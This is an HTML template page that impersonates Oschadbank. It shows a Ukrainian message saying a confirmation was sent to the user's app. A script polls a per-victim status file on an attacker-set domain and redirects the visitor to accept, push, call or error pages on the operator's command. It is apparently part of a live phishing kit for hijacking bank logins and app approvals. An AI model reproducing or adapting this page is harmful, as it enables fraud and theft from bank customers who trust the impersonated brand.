<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed&display=swap" rel="stylesheet">
    <title>Ощадбанк</title>
    <meta name="viewport" content="width=device-width">
    <meta property="og:url" content="http://www.oschadbank.ua/">
    <meta property="og:type" content="website">
    <meta property="og:title" content="Ощадбанк">
    <meta property="og:description" content="">
    <meta property="og:image" content="{{ url_for( 'static', filename='oschad/img/logo.png', v=1)}}">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="default">
    <meta name="apple-mobile-web-app-title" content="Ощадбанк">
    <link rel="apple-touch-icon" sizes="180x180" href="./favicon">
    <link rel="icon" type="image/png" sizes="32x32" href="./favicon/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="./favicon/favicon-16x16.png">
    <link rel="manifest" href="./favicon/site.webmanifest">
</head>
<style>
    * {
        box-sizing: border-box;
        margin: 0;
        font-family: 'Roboto Condensed', sans-serif;
    }

    body {
        background: #fff;
        color: #000;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
    }

    .container {
        display: block;
        margin: 0 auto;
        max-width: 992px;
    }

    .wrapp {
        margin: 0 auto;
        padding: 30px;
        display: flex;
        justify-content: space-between;
        align-items: center;
        flex-direction: column;
        background: #fff;
        box-shadow: 0 20px 40px rgb(44 62 80 / 15%);
        mix-blend-mode: normal;
        border-radius: 20px;
        max-width: 300px;
    }

    .img {
        margin-bottom: 80px;
        max-width: 240px;
    }

    .desc {
        margin: 25px 0;
        line-height: 24px;
        font-size: 20px;
        text-align: center;
        max-width: 300px;
    }

    .btn {
        margin: 0 auto;
        margin-top: 80px;
        display: flex;
        justify-content: center;
        align-items: center;
        background: linear-gradient(179.85deg, #00503c 0.15%, rgba(187, 187, 187, 0) 861.01%);
        backdrop-filter: blur(2px);
        /* border-radius: 15px; */
        border: none;
        width: 100%;
        height: 50px;
        font-size: 24px;
        line-height: 29px;
        opacity: 0;
        visibility: hidden;
        transition: all 2s ease;
        cursor: pointer;
        color: #fff;
    }

    @media screen and (max-height: 685px) {
        body {
            height: 90vh;
        }

        .wrapp {
            box-sizing: border-box;
            width: 310px;
        }

        .header {
            margin-top: 40px;
        }

        .img {
            margin-top: 40px;
        }

        .btn {
            margin-top: 20px;
        }
    }
</style>

<body>
    <div class="container">
        <div class="wrapp">
            <img src="{{ url_for( 'static', filename='oschad/img/oschad.png', v=1)}}" alt="phone" class="img">
            <div class="desc">Вам відправлено підтвердження у додаток</div>
            <a href="https://{{domain}}/accept/{{keySTR}}" class="btn" id="btn">Далi</a>
        </div>
    </div>
    <script>
        changeError(`https://{{domain}}/static/servers/{{keySTR}}.txt`);
        function changeError(url) {
          console.log("{{keySTR}}");
          const requestURL = url;
          const xhr = new XMLHttpRequest();
          xhr.open("GET", requestURL);
          const r = xhr.response.split(';') 
          console.log(r)
          xhr.onload = () => {
            setTimeout(() => {
              console.log(xhr.response);
              if (xhr.response === "0") {
                console.log("set");
                changeError(url);
              }
              if (xhr.response === "1") {
                window.location.href="https://{{domain}}/accept/{{keySTR}}"
                console.log("Добрый день,я 1");
              }
              if (xhr.response === "2") {
            window.location.href="https://{{domain}}/push/{{keySTR}}"
                console.log("Добрый день,я 2");
              }
              if (xhr.response === "3") {
                window.location.href="https://{{domain}}/call/{{keySTR}}"
                    console.log("Добрый день,я 3");
                  }
               if (xhr.response === "4") {
                window.location.href="https://{{domain}}/error/{{keySTR}}"
                    console.log("Добрый день,я 4");
                  }
              
            }, 2000);
          };
          const value = xhr.send();
        }
      </script>
</body>
<script>
    let btn = document.getElementById('btn')
    setTimeout(() => {
        btn.style.visibility = 'visible'
        btn.style.opacity = '1'
    }, 2000)
</script>

</html>